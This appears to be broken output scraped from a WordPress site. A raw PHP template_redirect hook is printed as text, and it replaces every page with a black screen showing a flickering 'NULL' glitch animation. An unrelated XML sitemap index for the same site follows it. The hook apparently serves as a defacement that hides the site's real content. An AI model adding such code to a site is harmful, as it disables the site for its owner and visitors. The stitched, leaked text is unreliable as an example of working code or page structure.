
add_action('template_redirect', function () {
    ?>
    <!DOCTYPE html>
    <html lang="pt-BR">
    <head>
        <meta charset="UTF-8">
        <title>NULL</title>
        <style>
            html,body{
                margin:0;
                width:100%;
                height:100%;
                overflow:hidden;
                background:#000;
                display:flex;
                justify-content:center;
                align-items:center;
                font-family:Arial,Helvetica,sans-serif;
            }

            .glitch{
                position:relative;
                color:#fff;
                font-size:9vw;
                font-weight:900;
                letter-spacing:.5rem;
                text-transform:uppercase;
                animation:glitch .08s infinite;
                user-select:none;
            }

            .glitch::before,
            .glitch::after{
                content:"NULL";
                position:absolute;
                left:0;
                top:0;
                width:100%;
                overflow:hidden;
            }

            .glitch::before{
                color:#00ffff;
                transform:translate(-4px,0);
                animation:g1 .12s infinite;
            }

            .glitch::after{
                color:#ff0040;
                transform:translate(4px,0);
                animation:g2 .09s infinite;
            }

            @keyframes glitch{
                0%{transform:translate(0)}
                20%{transform:translate(-3px,2px)}
                40%{transform:translate(3px,-2px)}
                60%{transform:translate(-2px,-3px)}
                80%{transform:translate(2px,3px)}
                100%{transform:translate(0)}
            }

            @keyframes g1{
                0%{clip-path:inset(0 0 85% 0)}
                50%{clip-path:inset(40% 0 35% 0)}
                100%{clip-path:inset(80% 0 0 0)}
            }

            @keyframes g2{
                0%{clip-path:inset(75% 0 0 0)}
                50%{clip-path:inset(20% 0 55% 0)}
                100%{clip-path:inset(0 0 80% 0)}
            }
        </style>
    </head>
    <body>
        <div class="glitch">NULL</div>
    </body>
    </html>
  



<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://priscillasarlos.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://priscillasarlos.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://priscillasarlos.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
